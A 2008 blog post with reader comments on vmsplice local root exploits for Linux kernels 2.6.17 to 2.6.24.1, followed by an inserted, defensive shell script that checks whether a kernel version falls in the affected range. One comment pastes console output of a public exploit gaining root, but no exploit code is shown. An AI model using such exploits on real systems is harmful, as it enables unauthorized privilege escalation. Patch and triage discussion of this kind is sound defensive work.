Root exploit for Linux 2.6.24.1
Posted by micele - 11/02/08 at 12:02:34 pm
It’s time for a new local root exploit on the Linux kernel. Two exploits have been reported. Both are based on sloppy handling of pointers in the function vmsplice, which was introduced in kernel release 2.6.17. For this reason one of the exploits works for all kernel versions from 2.6.17 to 2.6.24.1. Kernel Bug Tracker says:
Both exploits cause kernel Oops or (randomly) give root privileges to the user.
A new kernel version, 2.6.24.2, has been released and its changelog reports a kind of fix. But comments like
But we also must check whether we can access the actual memory region pointed to by the struct iovec to fix the access checks properly.
still don’t sound like 100% fixed and reliable…
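A quick triage aid for the version range given above, added here as an example and not part of the original post or of any kernel tooling. The function names are hypothetical, the sample release strings are constructed, and the range is taken only from the post; a distribution kernel may carry a backported fix under an older version number, so a match means "check the changelog", not "confirmed vulnerable".

```shell
#!/bin/sh
# Added example: classify kernel release strings against the range named in
# the post (2.6.17 through 2.6.24.1). All function names are hypothetical.

# Print "major minor patch sublevel" for a release such as "2.6.22-14-generic"
# or "2.6.24.1". Distro suffixes are cut off, missing fields become 0.
parse_release() {
    # Drop everything from the first character that is not a digit or a dot.
    base=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    old_ifs=$IFS; IFS=.
    set -- $base
    IFS=$old_ifs
    echo "${1:-0} ${2:-0} ${3:-0} ${4:-0}"
}

# Encode a release as a single integer so that ranges compare numerically.
release_key() {
    set -- $(parse_release "$1")
    echo $(( (($1 * 1000 + $2) * 1000 + $3) * 1000 + $4 ))
}

# Return 0 when the release lies in [2.6.17, 2.6.24.1], otherwise 1.
in_vmsplice_range() {
    key=$(release_key "$1")
    [ "$key" -ge "$(release_key 2.6.17)" ] &&
        [ "$key" -le "$(release_key 2.6.24.1)" ]
}

report() {
    if in_vmsplice_range "$1"; then
        echo "$1: inside 2.6.17..2.6.24.1, confirm the vmsplice fix in the vendor changelog"
    else
        echo "$1: outside the range named in the post"
    fi
}

# Constructed sample inputs; on a real host pass "$(uname -r)" instead.
for r in 2.6.16.60 2.6.17 2.6.22-14-generic 2.6.24.1 2.6.24.2; do
    report "$r"
done
```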
3 Comments »
If anyone is too lazy (like me) to compile a new kernel, there is a quick fix here:
http://www.hostblogger.de/blog/archives/2798-Bug-root...
Comment by Dietrich — February 11, 2008 #
…cking/kernel-2.6 > ./jessica_biel_naked_in_my_bed
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ece000 .. 0xb7f00000
[+] root
root@lapetos kernel-2.6 $
and
…cking/kernel-2.6 > ./diane_lane_fucked_hard
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] addr: 0xc0111a4d
[+] root
root@lapetos kernel-2.6 $
first compile and first try, each!
Comment by bene — February 11, 2008 #
http://lwn.net/SubscriberLink/268783/6928eb6921800e25/ - there is a more detailed explanation of the vuln there.
Comment by soeren — February 15, 2008 #